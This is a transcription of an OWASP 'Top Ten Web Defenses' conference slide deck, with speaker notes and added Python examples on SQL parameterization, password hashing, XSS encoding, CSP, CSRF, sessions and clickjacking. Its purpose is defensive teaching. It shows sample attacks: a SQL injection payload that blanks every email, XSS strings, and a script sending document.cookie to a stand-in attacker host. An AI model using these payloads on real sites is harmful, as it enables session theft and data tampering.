Top Ten Defenses
It's ok to cheat

OWASP Cheatsheet Series
https://www.owasp.org/index.php/Cheat_Sheets




HACKED
    © 2012 WhiteHat Security, Inc.
';
Anatomy of a SQL Injection Attack
$NEW_EMAIL = Request['new_email'];
$USER_ID = Request['user_id'];

update users set email='$NEW_EMAIL'
where id=$USER_ID;

SUPER AWESOME HACK: $NEW_EMAIL =   ';
update users set email='';
[1] Query Parameterization (PHP)

// request values (assumed to come from the form, as in the slide's Request[...])
$email = $_POST['new_email'];
$id = (int) $_POST['user_id'];

$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id, PDO::PARAM_INT);
$stmt->execute();
Query Parameterization (.NET)
SqlConnection objConnection = new SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
  "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name", NameTextBox.Text);
objCommand.Parameters.Add("@Password", PassTextBox.Text);
SqlDataReader objReader = objCommand.ExecuteReader();
Query Parameterization (Java)
String newName = request.getParameter("newName");
String id = request.getParameter("id");

// SQL: placeholders in the statement text, values bound afterwards
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
pstmt.executeUpdate();

// HQL: named parameter bound the same way
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
Query Parameterization (Ruby)
# Create
Project.create!(:name => 'owasp')
# Read (bind values go in the conditions array, never interpolated into the string)
Project.all(:conditions => ["name = ?", name])
Project.all(:conditions => { :name => name })
Project.where("name = :name", :name => name)
Project.where(:id => params[:id]).all
# Update
project.update_attributes(:name => 'owasp')
Query Parameterization (Cold Fusion)

<cfquery name="getFirst" dataSource="cfsnippets">
   SELECT * FROM #strDatabasePrefix#_courses
   WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER">
</cfquery>
Query Parameterization (PERL)
my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )";
my $sth = $dbh->prepare( $sql );
$sth->execute( $bar, $baz );
Query Parameterization (.NET LINQ)
public bool login(string loginId, string shrPass) {
   DataClassesDataContext db = new DataClassesDataContext();
   var validUsers = from user in db.USER_PROFILE
                    where user.LOGIN_ID == loginId && user.PASSWORDH == shrPass
                    select user;
   if (validUsers.Count() > 0) return true;
   return false;
}
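As an added example (not code from the deck), the update on the "Anatomy" slide in Python with sqlite3: the concatenated form runs the slide's `';` payload as a separate statement and blanks every row, while the bound-parameter form, the Python counterpart of the PHP/Java/Perl slides above, stores the payload as a literal string. The users table and its two rows are constructed for the demo.

```python
import sqlite3


def make_db():
    # Constructed demo table (not the deck's schema): two users with known emails.
    con = sqlite3.connect(":memory:")
    con.execute("create table users (id integer primary key, email text)")
    con.executemany("insert into users values (?, ?)",
                    [(1, "alice@example.test"), (2, "bob@example.test")])
    con.commit()
    return con


def build_concatenated_update(new_email, user_id):
    # The slide's query: request values pasted straight into the SQL text.
    return f"update users set email='{new_email}' where id={user_id};"


def vulnerable_update(con, new_email, user_id):
    # executescript() runs the text statement by statement, like a driver that
    # allows stacked queries: the slide's payload closes the string early, so the
    # first statement becomes "update users set email='';" and hits every row.
    sql = build_concatenated_update(new_email, user_id)
    try:
        con.executescript(sql)
    except sqlite3.Error:
        pass  # the leftover fragment fails to parse, but the first statement already ran
    return sql


def parameterized_update(con, new_email, user_id):
    # The PHP/Java/Perl slides in Python: placeholders in the SQL, values bound
    # separately, so the payload is stored as data and the query shape cannot change.
    cur = con.execute("update users set email=? where id=?", (new_email, int(user_id)))
    con.commit()
    return cur.rowcount


def emails(con):
    return dict(con.execute("select id, email from users order by id"))


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_update(con, "';", 1), emails(con))
    con = make_db()
    parameterized_update(con, "';", 1)
    print(emails(con))
```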
[2] Secure Password Storage

public String hash(String password, String userSalt, int iterations)
      throws EncryptionException {
  byte[] bytes = null;
  try {
    MessageDigest digest = MessageDigest.getInstance(hashAlgorithm);
    digest.reset();
    digest.update(ESAPI.securityConfiguration().getMasterSalt());
    digest.update(userSalt.getBytes(encoding));
    digest.update(password.getBytes(encoding));

    // rehash a number of times to help strengthen weak passwords
    bytes = digest.digest();
    for (int i = 0; i < iterations; i++) {
      digest.reset();
      bytes = digest.digest(bytes);
    }
    String encoded = ESAPI.encoder().encodeForBase64(bytes, false);
    return encoded;
  } catch (Exception ex) {
    throw new EncryptionException("Internal error", "Error");
  }
}
Secure Password Storage

public String hash(String password, String userSalt, int iterations)
      throws EncryptionException {
  byte[] bytes = null;
  try {
    MessageDigest digest = MessageDigest.getInstance(hashAlgorithm);
    digest.reset();
    digest.update(ESAPI.securityConfiguration().getMasterSalt());
    digest.update(userSalt.getBytes(encoding));
    digest.update(password.getBytes(encoding));

    // rehash a number of times to help strengthen weak passwords
    bytes = digest.digest();
    for (int i = 0; i < iterations; i++) {
      digest.reset();
      // slide's sketch (pseudocode): mix the salts and the round number into each rehash
      bytes = digest.digest(salts + bytes + hash(i));
    }
    String encoded = ESAPI.encoder().encodeForBase64(bytes, false);
    return encoded;
  } catch (Exception ex) {
    throw new EncryptionException("Internal error", "Error");
  }
}
Secure Password Storage
• BCRYPT
- Really slow on purpose
- Blowfish derived
- Suppose you are supporting millions of concurrent logins…
- Takes about 10 concurrent runs of BCRYPT to pin a high performance laptop CPU

• PBKDF2
- Takes up a lot of memory
- Suppose you are supporting millions of concurrent logins…
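An added example, not ESAPI's code: the deck's iterated-digest routine rewritten in Python beside a PBKDF2 store/verify pair with a per-user random salt and a constant-time comparison. The master salt, iteration counts and the stored-record layout are demo choices, not ESAPI's configuration.

```python
import base64
import hashlib
import hmac
import os

MASTER_SALT = b"demo-master-salt"   # constructed; ESAPI reads this from its configuration
ESAPI_ITERATIONS = 1024             # constructed rehash count for the demo


def esapi_style_hash(password, user_salt, iterations=ESAPI_ITERATIONS, algorithm="sha512"):
    # The slide's routine: digest(masterSalt || userSalt || password), then rehash
    # the output `iterations` times and base64-encode the result.
    digest = hashlib.new(algorithm)
    digest.update(MASTER_SALT)
    digest.update(user_salt.encode("utf-8"))
    digest.update(password.encode("utf-8"))
    out = digest.digest()
    for _ in range(iterations):
        out = hashlib.new(algorithm, out).digest()
    return base64.b64encode(out).decode("ascii")


PBKDF2_ITERATIONS = 100_000   # demo value; tune so one hash costs a noticeable fraction of a second


def pbkdf2_store(password, salt=None, iterations=PBKDF2_ITERATIONS):
    # Deliberately slow KDF with a fresh 16-byte random salt per user; the record
    # carries scheme, iteration count and salt so the parameters can be raised later.
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(
        iterations, base64.b64encode(salt).decode("ascii"), base64.b64encode(dk).decode("ascii"))


def pbkdf2_verify(password, stored):
    # Recompute with the stored parameters and compare in constant time.
    scheme, iterations, salt_b64, dk_b64 = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


if __name__ == "__main__":
    print(esapi_style_hash("correct horse", "user-salt"))
    record = pbkdf2_store("correct horse")
    print(record, pbkdf2_verify("correct horse", record), pbkdf2_verify("wrong", record))
```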
Anatomy of a XSS Attack
<script>window.location='http://evileviljim.com/unc/data=' + document.cookie;</script>

<script>document.body.innerHTML='<blink>CYBER IS COOL</blink>';</script>
[3] Contextual Output Encoding (XSS Defense)
  – Session Hijacking
  – Site Defacement
  – Network Scanning
  – Undermining CSRF Defenses
  – Site Redirection/Phishing
  – Load of Remotely Hosted Scripts
  – Data Theft
  – Keystroke Logging
  – Attackers using XSS more frequently
XSS Defense by Data Type and Context

Data Type             Context             Defense
String                HTML Body           HTML Entity Encode
String                HTML Attribute      Minimal Attribute Encoding
String                GET Parameter       URL Encoding
String                Untrusted URL       URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification
String                CSS                 Strict structural validation, CSS Hex encoding, good design
HTML                  HTML Body           HTML Validation (JSoup, AntiSamy, HTML Sanitizer)
Any                   DOM                 DOM XSS Cheat Sheet
Untrusted JavaScript  Any                 Sandboxing
JSON                  Client Parse Time   JSON.parse() or json2.js

Safe HTML Attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing,
class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight,
marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan,
scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width
HTML Body Context

<span>UNTRUSTED DATA</span>

HTML Attribute Context

<input type="text" name="fname" value="UNTRUSTED DATA">

attack: "><script>/* bad stuff */</script>

HTTP GET Parameter Context

<a href="/site/search?value=UNTRUSTED DATA">clickme</a>

URL Context

<a href="UNTRUSTED URL">clickme</a>
<iframe src="UNTRUSTED URL" />

attack: javascript:eval(/* BAD STUFF */)

CSS Value Context

<div style="width: UNTRUSTED DATA;">Selection</div>

attack: expression(/* BAD STUFF */)

JavaScript Variable Context

<script>var currentValue='UNTRUSTED DATA';</script>
<script>someFunction('UNTRUSTED DATA');</script>

attack: ');/* BAD STUFF */

JSON Parsing Context

JSON.parse(UNTRUSTED JSON DATA)
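Added example (not from the deck or any cheat sheet): one encoder per context from the table and the slides above, run against the attack strings the slides show. The function names and the URL allow-list rule are this example's choices; the attribute and JavaScript encoders escape every non-alphanumeric character, a superset of the "minimal" encoding the table names.

```python
import html
from urllib.parse import quote, urlsplit


def encode_html_body(s):
    # HTML body context: entity-encode & < > " ' so the data can never open a tag.
    return html.escape(s, quote=True)


def encode_html_attr(s):
    # HTML attribute context: &#xHH; for everything except alphanumerics, so the
    # value cannot close the quote (slide attack: "><script>...).
    return "".join(c if c.isalnum() else "&#x{:X};".format(ord(c)) for c in s)


def encode_js_string(s):
    # JavaScript string context: \xHH (\uHHHH above 0xFF) for non-alphanumerics,
    # so ');/* BAD STUFF */ stays inside the quoted string.
    out = []
    for c in s:
        if c.isalnum() and ord(c) < 128:
            out.append(c)
        elif ord(c) < 256:
            out.append("\\x{:02X}".format(ord(c)))
        else:
            out.append("\\u{:04X}".format(ord(c)))
    return "".join(out)


def encode_url_param(s):
    # GET parameter context: percent-encode the value before it goes into the query string.
    return quote(s, safe="")


def encode_css_value(s):
    # CSS value context: \HH hex escape (trailing space terminates the escape),
    # so expression(...) cannot be interpreted as a CSS function.
    return "".join(c if c.isalnum() else "\\{:X} ".format(ord(c)) for c in s)


def safe_url(url):
    # Untrusted URL context: allow only http/https absolute URLs or site-relative
    # paths; anything else (javascript:, data:, scheme-relative //host) is rejected.
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return candidate
    if parts.scheme == "" and candidate.startswith("/") and not candidate.startswith("//"):
        return candidate
    return None


if __name__ == "__main__":
    print(encode_html_attr('"><script>/* bad stuff */</script>'))
    print(encode_js_string("');/* BAD STUFF */"))
    print(encode_css_value("expression(/* BAD STUFF */)"))
    print(safe_url("javascript:eval(/* BAD STUFF */)"), safe_url("/site/search?value=x"))
```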

SAFE use of JQuery

$('#element').text(UNTRUSTED DATA);

UNSAFE use of JQuery

$('#element').html(UNTRUSTED DATA);
Dangerous jQuery 1.7.2 Data Types
- CSS
- HTML
- Some Attribute Settings
- URL (Potential Redirect)

jQuery methods that directly update DOM or can execute JavaScript:
$() or jQuery(), .add(), .after(), .animate(), .append(), .appendTo(), .attr(), .css(), .html(), .insertAfter(), .insertBefore()
Note: .text() updates DOM, but is safe.

jQuery methods that accept URLs to potentially unsafe content:
jQuery.ajax(), jQuery.get(), jQuery.getScript(), jQuery.post(), load()




JQuery Encoding with JQencoder

Contextual encoding is a crucial technique needed to stop all types of XSS.

jqencoder is a jQuery plugin that allows developers to do contextual encoding in JavaScript to stop DOM-based XSS.

http://plugins.jquery.com/plugin-tags/security

$('#element').encode('html', cdata);
Best Practice: DOM-Based XSS Defense
• Untrusted data should only be treated as displayable text
• JavaScript encode and delimit untrusted data as quoted strings
• Use document.createElement("…"),
  element.setAttribute("…","value"), element.appendChild(…),
  etc. to build dynamic interfaces (safe attributes only)
• Avoid use of HTML rendering methods
• Make sure that any untrusted data passed to eval() methods is
  delimited with string delimiters and enclosed within a closure
  such as eval(someFunction(‘UNTRUSTED DATA’));
[4]                  Content Security Policy
 • Anti-XSS W3C standard
 • CSP 1.1 Draft 19 published August 2012
  - https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html
 • Must move all inline script and style into external scripts
 • Add the X-Content-Security-Policy response header to instruct
   the browser that CSP is in use
  - Firefox/IE10PR: X-Content-Security-Policy
  - Chrome Experimental: X-WebKit-CSP
  - Content-Security-Policy-Report-Only
 • Define a policy for the site regarding loading of content
CSP By Example 1
Source: http://people.mozilla.com/~bsterne/content-security-policy/details.html

Site allows images from anywhere, plugin content from a list of
trusted media providers, and scripts only from its server:

X-Content-Security-Policy: allow 'self'; img-src *; object-src media1.com media2.com; script-src scripts.example.com
CSP By Example 2
Source: http://www.html5rocks.com/en/tutorials/security/content-security-policy/

Site that loads resources from a content delivery network and
does not need framed content or any plugins:

X-Content-Security-Policy: default-src https://cdn.example.net; frame-src 'none'; object-src 'none'
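Added example (not from either source): a small parser for the header value that resolves the effective source list of a directive, falling back to default-src or the pre-standard allow as the two example policies do (an unset directive with no fallback is wide open), plus a lint pass over the two directives a reviewer checks first. Directive names are the ones the slides use; the lint findings are this example's wording.

```python
FETCH_DIRECTIVES = ("script-src", "style-src", "img-src", "object-src",
                    "frame-src", "font-src", "media-src", "connect-src")


def parse_csp(header_value):
    # "default-src a b; img-src *" -> {"default-src": ["a", "b"], "img-src": ["*"]}
    policy = {}
    for chunk in header_value.split(";"):
        tokens = chunk.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def effective_sources(policy, directive):
    # An unset fetch directive inherits default-src (or Mozilla's older 'allow');
    # with neither set it behaves as if '*' had been specified.
    if directive in policy:
        return policy[directive]
    for fallback in ("default-src", "allow"):
        if fallback in policy:
            return policy[fallback]
    return ["*"]


def lint_csp(header_value):
    # Flags the two weaknesses that undo the anti-XSS value of a policy:
    # script or plugin content from any origin, and inline script.
    policy = parse_csp(header_value)
    findings = []
    for directive in ("script-src", "object-src"):
        sources = effective_sources(policy, directive)
        if "*" in sources:
            findings.append(f"{directive} allows any origin")
        if directive == "script-src" and "'unsafe-inline'" in sources:
            findings.append("script-src permits inline script")
    return findings


if __name__ == "__main__":
    for value in ("allow 'self'; img-src *; object-src media1.com media2.com; script-src scripts.example.com",
                  "default-src https://cdn.example.net; frame-src 'none'; object-src 'none'"):
        policy = parse_csp(value)
        print({d: effective_sources(policy, d) for d in FETCH_DIRECTIVES}, lint_csp(value))
```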
[5] Cross-Site Request Forgery: Tokens and Re-authentication

      – Cryptographic Tokens
        • Primary and most powerful defense.
          Randomness is your friend

      – Require users to re-authenticate
        • Amazon.com does this *really* well

      – Double-cookie submit defense
        • Decent defense, but not based on
          randomness; based on SOP
[6]        Multi Factor Authentication
      – Passwords as a single AuthN factor are DEAD!
      – Mobile devices are quickly becoming the “what
        you have” factor
      – SMS and native apps for MFA are not perfect
        but heavily reduce risk vs. passwords only
      – Password strength and password policy can be
        MUCH WEAKER in the face of MFA
      – If you are protecting your magic user and fireball
        wand with MFA (Blizzard.net) you may also wish
        to consider protecting your multi-billion dollar
        enterprise with MFA
[7]    Forgot Password Secure Design
      – Require identity and security questions
         • Last name, account number, email, DOB
         • Enforce lockout policy
         • Ask one or more good security questions
            – http://www.goodsecurityquestions.com/
      – Send the user a randomly generated token
        via out-of-band method
         • email, SMS or token
      – Verify code in same Web session
         • Enforce lockout policy
      – Change password
         • Enforce password policy
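An added example of the four-step flow above as a Python state machine (not code from the deck): security questions with a lockout, a random token bound to the requesting web session and delivered through an injected out-of-band callback, verification in that same session, then a password change gated on the policy. The `send`, `store` and `now` hooks, the attempt limit and the token lifetime are this example's assumptions.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5        # lockout threshold for questions and for codes (demo value)
TOKEN_TTL = 15 * 60     # seconds the out-of-band token stays valid (demo value)


class PasswordReset:
    """Reset flow for one account. `send` (out-of-band delivery), `store`
    (password persistence, which should hash as in [2]) and `now` are
    hypothetical hooks supplied by the caller."""

    def __init__(self, account, send, store, now=time.time):
        self.account, self.send, self.store, self.now = account, send, store, now
        self.question_failures = self.code_failures = 0
        self.locked = False
        self.token = self.token_session = self.token_issued = None
        self.verified_session = None

    def answer_questions(self, session_id, answers):
        # Step 1: identity and security questions; every answer is compared in
        # constant time and the account locks after MAX_ATTEMPTS failures.
        if self.locked:
            return False
        expected = self.account["answers"]
        ok = set(answers) == set(expected) and all(
            hmac.compare_digest(expected[q], a.strip().lower())
            for q, a in answers.items())
        if not ok:
            self.question_failures += 1
            self.locked = self.question_failures >= MAX_ATTEMPTS
            return False
        # Step 2: random token, bound to this web session, delivered out of band.
        self.token = secrets.token_urlsafe(24)
        self.token_session, self.token_issued = session_id, self.now()
        self.send(self.account["contact"], self.token)
        return True

    def verify_code(self, session_id, code):
        # Step 3: same web session, unexpired token, constant-time compare,
        # lockout on repeated wrong codes, single use.
        if self.locked or self.token is None:
            return False
        if session_id != self.token_session or self.now() - self.token_issued > TOKEN_TTL:
            return False
        if not hmac.compare_digest(self.token, code):
            self.code_failures += 1
            self.locked = self.code_failures >= MAX_ATTEMPTS
            return False
        self.token = None
        self.verified_session = session_id
        return True

    def change_password(self, session_id, new_password, policy=lambda p: len(p) >= 12):
        # Step 4: only after verification in this same session, and only if the
        # new password satisfies the password policy.
        if session_id != self.verified_session or not policy(new_password):
            return False
        self.store(new_password)
        self.verified_session = None
        return True
```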
[8]             Session Defenses
      – Ensure secure session IDs
         • 20+ bytes, cryptographically random
         • Stored in HTTP Cookies
         • Cookies: Secure, HTTP Only, limited path
         • No Wildcard Domains
      – Generate new session ID at login time
         • To avoid session fixation
      – Session Timeout
         • Idle Timeout
         • Absolute Timeout
         • Logout Functionality
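Added example covering [5] and [8] (not code from the deck): a session ID of 32 random bytes in a Secure, HttpOnly, path-limited cookie with no Domain attribute, a new ID at login, idle and absolute timeouts, a per-session cryptographic CSRF token compared in constant time, and the double-cookie submit comparison beside it. The cookie name, the timeout values and the injectable clock are this example's assumptions.

```python
import base64
import hmac
import secrets
import time

SESSION_ID_BYTES = 32   # the slide asks for 20+ cryptographically random bytes


def new_session_id():
    # 32 random bytes as unpadded URL-safe base64: 43 characters.
    return base64.urlsafe_b64encode(secrets.token_bytes(SESSION_ID_BYTES)).decode().rstrip("=")


def session_set_cookie(session_id, path="/app"):
    # Secure + HttpOnly + limited Path; no Domain attribute, so no wildcard domain.
    return f"SESSIONID={session_id}; Path={path}; Secure; HttpOnly"


class Session:
    def __init__(self, idle_timeout=900, absolute_timeout=8 * 3600, now=time.time):
        self.now = now                       # injectable clock (the demo below uses a fake one)
        self.id = new_session_id()
        self.csrf_token = secrets.token_urlsafe(32)
        self.created = self.last_seen = now()
        self.idle_timeout, self.absolute_timeout = idle_timeout, absolute_timeout
        self.authenticated = False

    def login(self):
        # A new ID at login time defeats session fixation; the CSRF token rotates with it.
        self.id = new_session_id()
        self.csrf_token = secrets.token_urlsafe(32)
        self.authenticated = True

    def touch(self):
        # Called on every request: enforces idle and absolute timeouts, returns False once expired.
        t = self.now()
        if t - self.last_seen > self.idle_timeout or t - self.created > self.absolute_timeout:
            self.logout()
            return False
        self.last_seen = t
        return True

    def logout(self):
        self.authenticated = False
        self.csrf_token = None

    def check_csrf(self, submitted):
        # Per-session random token compared in constant time with the form/header value.
        if self.csrf_token is None or submitted is None:
            return False
        return hmac.compare_digest(self.csrf_token, submitted)


def check_double_submit(cookie_token, form_token):
    # Double-cookie submit: no server-side state; it relies on the same-origin policy
    # keeping the cookie value unreadable to a cross-site page, not on randomness the
    # server remembers.
    if not cookie_token or not form_token:
        return False
    return hmac.compare_digest(cookie_token, form_token)


if __name__ == "__main__":
    s = Session()
    s.login()
    print(session_set_cookie(s.id), s.check_csrf(s.csrf_token), s.touch())
```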
Anatomy of a Clickjacking Attack
[9]                X-Frame-Options

  // to prevent all framing of this content
  response.addHeader( "X-FRAME-OPTIONS", "DENY" );

  // to allow framing of this content only by this site
  response.addHeader( "X-FRAME-OPTIONS", "SAMEORIGIN" );

  // to allow framing from a specific domain
  response.addHeader( "X-FRAME-OPTIONS", "ALLOW-FROM X" );
Legacy Browser Clickjacking Defense
<style id="antiCJ">body{display:none !important;}</style>
<script type="text/javascript">
if (self === top) {
   // not framed: remove the hiding style so the page renders
   var antiClickjack = document.getElementById("antiCJ");
   antiClickjack.parentNode.removeChild(antiClickjack);
} else {
   // framed: break out of the frame
   top.location = self.location;
}
</script>
[10] Encryption in Transit (HTTPS/TLS)
  – Authentication credentials and session identifiers must
    be encrypted in transit via HTTPS/SSL
     • Starting when the login form is rendered
     • Until logout is complete
     • CSP and HSTS can help here
  – https://www.ssllabs.com free online assessment of
    public-facing server HTTPS configuration
  – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
    for HTTPS best practices
...and love the WAF
[11] Virtual Patching

"A security policy enforcement layer which prevents the exploitation of a known vulnerability"
Virtual Patching
Rationale for Usage
  – No Source Code Access
  – No Access to Developers
  – High Cost/Time to Fix

Benefit
  – Reduce Time-to-Fix
  – Reduce Attack Surface
Strategic Remediation
• Ownership is Builders
• Focus on web application root causes of
  vulnerabilities and creation of controls in
  code
• Ideas during design and initial coding
  phase of SDLC
• This takes serious time, expertise and
  planning
Tactical Remediation
• Ownership is Defenders
• Focus on web applications that are
  already in production and exposed to
  attacks
• Examples include using a Web Application
  Firewall (WAF) such as ModSecurity
• Aim to minimize the Time-to-Fix
  exposures
OWASP ModSecurity Core Rule Set (CRS)

http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
jim@owasp.org

Top Ten Web Defenses - DefCamp 2012


Editor's Notes

  • #10 CVE-2012-2660/2661/2694: Active Record 3.0 and later for Ruby on Rails is vuln to Fixed in RoR 3.2.5, 3.1.5, 3.0.13. Rails 2.3.x is vulnerable to various injections that have NOT been patched and will NOT be patched, so please don't use it.
  • #13 LINQ writes parametrized, precompiled queries. This is the reason why SQL injection is not effective on LINQ-generated queries. The LINQ-generated query is shown below.
  • #17 Bcrypt is such a slow hashing algorithm. A speed comparison on a MacBook Pro with 2 GHz Intel Core 2 Duo: SHA-1: 118,600 hashes per second. Bcrypt (with cost = 10): 7.7 hashes per second.
  • #28 Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #29 CREDIT THIS TO DAVE WICHERS. Note: The issue with $() is being worked on and will hopefully be much harder to exploit in jQuery 1.8
  • #31 Need to expand this section!
  • #34 connect-src limits the origins to which you can connect (via XHR, WebSockets, and EventSource). font-src specifies the origins that can serve web fonts. Google's Web Fonts could be enabled via font-src https://themes.googleusercontent.com. frame-src lists the origins that can be embedded as frames. For example: frame-src https://youtube.com would enable embedding YouTube videos, but no other origins. img-src defines the origins from which images can be loaded. media-src restricts the origins allowed to deliver video and audio. object-src allows control over Flash and other plugins. style-src is script-src's counterpart for stylesheets. By default, directives are wide open. If you don't set a specific policy for a directive, let's say font-src, then that directive behaves by default as though you'd specified * as the valid source (e.g. you could load fonts from everywhere, without restriction). You can override this default behavior by specifying a default-src directive.
  • #38 OUTLINE
    1) Authentication, session management, and access control
       - Pre and post authentication session IDs
       - Session ID (temporary) equivalent to the strongest authentication method (point to authentication cheatsheet)
    2) Session ID secure properties
       2.1) Session ID name fingerprinting
       2.1) Session ID length
       2.2) Session ID entropy
       2.3) Session ID content
       2.4) Cryptographically strong session id
       2.5) Recommendations for a secure session management database
    3) Session ID exchange mechanisms
       3.1) Used vs. accepted session ID exchange mechanisms
    4) Session ID sent via cookies
       4.1) HTTPonly cookies (point to XSS cheatsheet)
       4.2) Secure cookies (point to TLS cheatsheet)
       4.3) Domain and path cookie attributes
       4.4) Expire attribute
       4.5) CSRF implications of cookies (point to CSRF cheatsheet)
       4.6) Cross-Site Tracing (XST) prevention
       4.7) HTTP response splitting prevention
       4.8) Cookie META tag prevention ????
    5) Session ID initial verification
       5.1) Permissive and strict session management
       5.2) Treat session ID as any other user input
    6) Renew the session ID after any privilege level change
    7) Session expiration (on both client and server)
       7.1) Automatic session expiration
          7.1.1) Idle timeout
          7.1.2) Absolute timeout
       7.2) Manual session expiration
          7.2.1) Logout button
          7.2.2) Javascript logout on window close
          7.2.3) Features for disabling session cross-tab
    8) Session hijacking detection
       8.1) Binding the session ID to other user properties
       8.2) Logging: Monitoring creation, life cycle, and destruction of session IDs
       8.3) Are multiple simultaneous logons allowed?
       8.4) Session management WAF protections
  • #44 Put this all in the HEAD tag